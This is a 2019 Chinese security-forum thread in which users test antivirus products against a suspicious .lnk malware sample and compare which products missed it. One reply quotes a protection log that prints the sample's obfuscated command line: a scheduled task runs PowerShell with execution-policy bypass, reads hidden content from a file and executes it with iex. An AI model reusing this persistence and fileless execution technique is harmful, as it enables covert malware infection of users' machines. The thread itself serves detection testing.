suspicious lnk.2

显示全部楼层 · 发表于 2019-7-22 16:26:08

本帖最后由 swizzer 于 2019-7-22 16:31 编辑

双击时请双击lnk
智量扫描miss，未测主防
欢迎双击！

显示全部楼层 · 发表于 2019-7-22 16:28:47

本帖最后由 liu237 于 2019-7-22 16:31 编辑

ESET both miss虚拟机双击，喵，至今没见反应，木马吗？

显示全部楼层 · 发表于 2019-7-22 16:29:57

Avast Miss

显示全部楼层 · 发表于 2019-7-22 16:30:03

liu237 发表于 2019-7-22 16:28
ESET both miss

这种类fileless的东西扫描的确难以查出

显示全部楼层 · 发表于 2019-7-22 16:33:48

liu237 发表于 2019-7-22 16:28
ESET both miss虚拟机双击，喵，至今没见反应，木马吗？

据云沙箱结果是恶意

显示全部楼层 · 发表于 2019-7-22 16:38:57

liu237 发表于 2019-7-22 16:28
ESET both miss虚拟机双击，喵，至今没见反应，木马吗？

2019\7\22 星期一 16:34:34 创建新进程允许
进程: c:\windows\explorer.exe
目标: c:\windows\system32\schtasks.exe
命令行: "C:\Windows\System32\schtasks.exe" /F /Create /TN "AI" /sc minute /MO 2 /ST 05:52 /TR "C:\Windows\system32\cmd.exe /c pow%tmp:~5,3%hell /ep bypass /win 1 /c '&{cd %public:~-15,9%;$m=ls -force -r -in comu*.*|select -last 1;$m=gc -LiteralPath $m|select -last 1;
规则: [应用程序]c:\windows\explorer.exe

2019\7\22 星期一 16:36:00 创建新进程阻止
进程: c:\windows\system32\taskeng.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\Windows\system32\cmd.exe /c pow%tmp:~5,3%hell /ep bypass /win 1 /c "&{cd %public:~-15,9%;$m=ls -force -r -in comu*.*|select -last 1;$m=gc -LiteralPath $m|select -last 1;iex $m}"
规则: [应用程序]* -> [子应用程序]『禁运』黑名单

挺狡猾的

显示全部楼层 · 发表于 2019-7-22 16:45:19

这次BD漏了

显示全部楼层 · 发表于 2019-7-22 16:47:20

静影沉璧发表于 2019-7-22 16:45
这次BD漏了

果然fileless是各家软肋？

显示全部楼层 · 发表于 2019-7-22 16:50:04

swizzer 发表于 2019-7-22 16:47
果然fileless是各家软肋？

这种东西可能企业版产品的情况好点

显示全部楼层 · 发表于 2019-7-22 17:11:25

本帖最后由 llcy 于 2019-7-22 17:16 编辑

文件: schtasks.exe (CL.Downloader!gen108)

[可疑文件] suspicious lnk.2

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源